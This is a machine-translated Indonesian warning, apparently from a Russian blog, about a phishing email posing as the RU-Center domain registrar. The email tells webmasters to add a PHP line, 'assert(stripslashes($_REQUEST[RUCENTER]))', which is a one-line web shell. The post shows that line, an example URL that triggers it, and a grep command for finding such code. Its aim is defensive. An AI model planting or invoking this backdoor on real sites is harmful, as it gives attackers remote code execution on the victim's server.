Perhatian untuk "webmaster" yang tidak tahu PHP. Kerentanan.

Ini adalah terjemahan otomatis.
Klik di sini untuk membaca publikasi dalam bahasa aslinya.

Hari ini beberapa teman saya menerima surat, diduga dari RU-Center (registrar nama domain Rusia terbesar) — nic.ru , dengan konten berikut:

Surat dikirim dari [email protected] . Dalam surat tersebut, para penyerang, yang mewakili diri mereka sendiri atas nama RU-Center, menyarankan untuk menempatkan kode berikut di situs web:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Sayangnya, banyak rekan kami yang menyebut diri mereka "webmaster" (banyak pemilik situs), tidak tahu PHP dan tidak memikirkan bahaya kode di atas. Jika Anda meneruskan string sebagai parameter ke fungsi ini, maka itu akan dianggap oleh assert() sebagai kode PHP! Hati-hati!

Saya sarankan Anda memeriksa kerentanan proyek php Anda menggunakan perintah assert atau eval. Jika perintah ini ada dalam kode proyek, jangan panik — pelajari algoritmenya. Penggunaan algoritma yang sah sangat mungkin dilakukan. Dalam kasus contoh di atas, perintah akan memungkinkan penyerang untuk memanggil situs Anda, misalnya, menggunakan parameter RUCENTER — http://sistema-audit.ru/?RUCENTER=PHP-code

Kami menyarankan Anda melakukan pencarian menggunakan, misalnya, perintah linux grep —i —r 'assert' / home / www / mysite / * menunjukkan folder dengan file situs untuk mendapatkan daftar file yang mencurigakan contoh adalah kode yang digunakan.

Jaga diri Anda dan situs Anda!

Ini adalah terjemahan otomatis.
Klik di sini untuk membaca publikasi dalam bahasa aslinya.